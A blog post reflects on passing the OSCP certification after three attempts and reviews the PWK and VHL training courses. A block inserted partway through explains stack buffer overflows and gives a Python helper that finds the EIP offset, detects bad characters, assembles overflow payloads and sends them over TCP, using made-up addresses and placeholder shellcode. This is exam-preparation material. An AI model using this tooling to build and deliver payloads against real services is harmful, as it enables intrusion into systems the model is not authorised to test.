OSCP Passed

Some Introspection on the most difficult IT exam taken to date

Posted by Asa Hess-Matsumoto on Thursday, February 11, 2021

Preamble

I received a notification the other day from Offensive Security that I passed their exam for the Offensive Security Certified Professional (OSCP) certification. This certification is notable for its difficulty and its hands-on format, requiring the test-taker to exercise a broad range of skills to evaluate, compromise, and escalate privileges on 5 distinct targets.

Some would describe the OSCP as an entry-level certification; I would disagree with what that statement conveys, but not with what I believe it’s intended to imply. People who are new to Information Technology (IT) or cybersecurity will find the exam enormously challenging; compared to most other certifications that are similarly labeled as “entry-level” (CompTIA Security+, Certified Ethical Hacker, etc.), expecting someone to pass this exam so early in their career is an incredible ask. The skillset required to attain the OSCP is broad and dense, including (but not limited to):

  • Linux and Windows OS command line interfaces
  • Bash scripting
  • Buffer Overflow exploit drafting
  • File transfers
  • Information Gathering (both active and passive)
  • Password attacks
  • Privilege Escalation
  • Web Application Attacks

However, despite the wide array of skills necessary to engage the exam, this certification only scratches the surface of potential avenues a burgeoning hacker (or cyber security professional) might want to explore; this is what I think the statement of “entry-level” is intended to imply. For example, the course doesn’t go deep into code analysis, web application exploitation, or reverse engineering. What this certification does fundamentally force students to learn is a methodology: how to assess and evaluate a target for potential vulnerabilities, how to test whether a vulnerability is actually exploitable, and which steps to take to enumerate a target once it’s compromised; it forces students to work with tools they may have never used before, encouraging them to research and understand the vulnerabilities and exploits they will need to employ.

Offensive Security offers an accompanying training course that is intended to help prepare students for the OSCP: “Penetration Testing With Kali Linux” (PWK). Taking the course equips the student with educational reading, a series of coursework challenges, and access to a lab environment that loosely models a corporate network for practice.

Personally, I found the course to have some mixed value. From strictly an educational perspective, it’s wonderful. The coursework built upon methods and techniques I was exposed to from eLearnSecurity’s Junior Penetration Tester (eJPT) course; it introduced me to many new procedures and technologies I hadn’t seen (such as PowerShell Empire and ProxyChains); and it challenged me in ways that forced me to learn difficult and complex topics. However, for all these strengths, the PWK coursework does not effectively prepare a student for the OSCP exam. The skills necessary to pass are diluted by a plethora of (admittedly interesting) other topics, such as Active Directory and network pivoting; the peer-led support for working through the lab environment isn’t learning-oriented (students offering hints to other students do not make for the best teachers - more often they mistake coy riddles for an effective substitute for engaged discussion); and the cost of having access to the lab is significantly greater than comparable services.

One other thing I want to mention about the PWK is the extra credit; by completing and documenting all of the coursework as well as performing a writeup on how you were able to compromise at least 10 different targets within the lab environment using distinct techniques, you can earn up to 5 points of extra credit on your exam. It should be noted, however, that the time it takes to perform these tasks is significant. The coursework alone took me just over a month to complete. That said, I would not have passed my exam had I not gone this extra mile.

I ended up taking the exam three times in order to pass.

First Exam

In my first attempt, there were several things I did right and wrong. Contrary to my above criticism of the PWK, one technique the course does a phenomenal job of teaching is the development of a buffer overflow exploit. In brief, a stack buffer overflow occurs when input (typically attacker-controlled) is copied into a fixed-size buffer without a length check, so the excess overwrites adjacent memory, including the saved return address that decides where execution resumes after the current function; by systematically working out which bytes of the input land where, an attacker can place a payload in memory and redirect execution to it, so that the payload runs with the privileges of the vulnerable program. By not only understanding but also preemptively codifying my steps to perform a buffer overflow exploit, I really empowered myself for the exam.
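The steps alluded to above (fuzz until the service crashes, send a cyclic pattern and read the EIP offset from the crash, find the bad characters the target mangles, then assemble filler, return address, NOP sled and shellcode) are the part of the exam most candidates script in advance. What follows is an added example written for this page, not the author's script and not course material: a Python helper covering the offline parts of that workflow. The service prefix `OVERFLOW1 `, the crash value `0x6F43396E`, the `JMP ESP` address `0x625011AF` and the "observed" memory dump are all constructed assumptions for the demonstration; only `send_payload` touches a network and it is never called here.

```python
"""Offline helpers for the 32-bit stack buffer overflow workflow taught for the OSCP.

Constructed example, not a real target or exploit: every address, prefix and
"memory dump" below is made up to exercise the helpers.
"""
import itertools
import socket
import string
import struct

# Aa0Aa1...Zz9 is 26*26*10 triples of 3 bytes; beyond that the pattern repeats.
MAX_PATTERN = 26 * 26 * 10 * 3


def cyclic_pattern(length):
    """Metasploit-style cyclic pattern. Every 4-byte window occurs once, so the
    dword that overwrites EIP identifies exactly which offset reached it."""
    if length > MAX_PATTERN:
        raise ValueError(f"a pattern longer than {MAX_PATTERN} bytes would repeat")
    out = bytearray()
    for upper, lower, digit in itertools.product(
            string.ascii_uppercase, string.ascii_lowercase, string.digits):
        out += f"{upper}{lower}{digit}".encode()
        if len(out) >= length:
            break
    return bytes(out[:length])


def pattern_offset(eip, length=MAX_PATTERN):
    """Turn the EIP value shown by the debugger after the crash back into an offset.
    EIP is displayed as a little-endian integer, so repack it before searching."""
    idx = cyclic_pattern(length).find(struct.pack("<I", eip))
    if idx < 0:
        raise ValueError(f"EIP {eip:#010x} not found; the overwrite was not a clean one")
    return idx


def badchar_string(exclude=b"\x00"):
    """All byte values not yet ruled out. \\x00 is excluded up front because it
    ends C strings; send the rest right after the EIP overwrite and dump ESP."""
    return bytes(b for b in range(256) if b not in exclude)


def find_badchars(sent, observed):
    """Diff the test string against what landed in memory. A byte the target
    rewrites shows up as a mismatch; a byte it drops shifts everything after
    it, so only trust the first hit, remove it, resend and repeat."""
    return [b for i, b in enumerate(sent)
            if i >= len(observed) or observed[i] != b]


def badchars_in(blob, badchars):
    """Which known bad characters a blob (return address, shellcode) contains."""
    return sorted(set(blob) & set(badchars))


def build_payload(offset, ret_addr, shellcode, prefix=b"", badchars=b"\x00", nop_sled=16):
    """prefix | filler up to EIP | return address (e.g. JMP ESP, little-endian)
    | NOP sled | shellcode. Refuses to build if a bad character slipped into the
    address or the shellcode: that mistake turns a shell into a silent crash."""
    ret = struct.pack("<I", ret_addr)
    for name, blob in (("return address", ret), ("shellcode", shellcode)):
        hit = badchars_in(blob, badchars)
        if hit:
            raise ValueError(f"{name} contains bad chars {[f'{b:#04x}' for b in hit]}")
    return prefix + b"A" * offset + ret + b"\x90" * nop_sled + shellcode


def send_payload(host, port, payload, timeout=5.0):
    """The live step: deliver one payload over TCP. Not run in the offline demo."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)


if __name__ == "__main__":
    # 1. Fuzzing crashed the (imaginary) service at ~2000 bytes; a 2000-byte pattern
    #    was sent and the debugger showed EIP = 0x6F43396E (constructed value).
    offset = pattern_offset(0x6F43396E, 2000)
    # 2. Bad-char run: pretend the target rewrites \x0a and \x0d to \x00 (constructed dump).
    sent = badchar_string()
    observed = sent.replace(b"\x0a", b"\x00").replace(b"\x0d", b"\x00")
    bad = find_badchars(sent, observed)
    # 3. Assemble with a made-up JMP ESP address and INT3s standing in for shellcode.
    payload = build_payload(offset, 0x625011AF, b"\xcc" * 4,
                            prefix=b"OVERFLOW1 ", badchars=bytes([0x00] + bad))
    print(f"offset={offset} bad={[hex(b) for b in bad]} payload={len(payload)} bytes")
```

The bad-character check in `build_payload` is the step most often skipped under exam pressure: msfvenom will happily encode around the bytes you pass with `-b`, but the `JMP ESP` address you picked by hand gets no such treatment, and a single `\x0a` in it is enough to turn a working exploit into a crash with no feedback.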

While I was well prepared in that aspect, I hadn’t done enough to refine my enumeration methods; as such, I flailed about trying to find a foothold on many of the targets. I looked for - and failed to find - vulnerabilities that would enable me to achieve Remote Code Execution (RCE) on my targets. I believe that the root cause for this was my reliance on the hints provided by my peers within the PWK student forums; to be clear, I think that when initially learning how to use the tools and technologies involved in hacking, it helps to be transparent. However, there comes a time when you need to develop the skill of enumeration - systematically discovering what a target exposes (services, versions, users, shares) and, from that, its vulnerabilities, with no hints and no prior knowledge of the environment.

Second Exam

My second attempt went very similarly to my first. I had attempted to prepare for the exam by watching various Hack The Box (HTB) solutions posted by IppSec on YouTube. However, by not practicing the act of enumerating, I found myself repeating the same mistakes as in my first attempt.

Third Exam

In preparing for my third attempt, I went back and got a subscription to a course parallel to the PWK, Virtual Hacking Labs (VHL). This platform offers a similar coursework/lab setup to the PWK, but I found that the community was far more invested in each other’s learning.

For a review of VHL, see my post here.

By abstaining from using hints, I really was able to develop my enumeration skillset. This carried quite a bit of water in my third and final attempt at the exam. I also overhauled how I was documenting my findings/work by using CherryTree (previously, I just copy/pasted directly into a Microsoft Word document and used assorted headers to organize). This was enormously helpful in keeping me focused and organized; it also paid dividends when it came time to write up the final report.

Takeaways:

  • The OSCP certification exam is challenging; it takes a significant amount of time and effort in order to properly prepare for it.
  • The PWK coursework/labs - while beneficial - are not optimized for preparing students for the exam.
  • There are a number of non-Offensive Security resources I found valuable in my studies (linked above and in the VHL review).
  • It’s critical to perform a post-mortem of your failures in order to foster growth.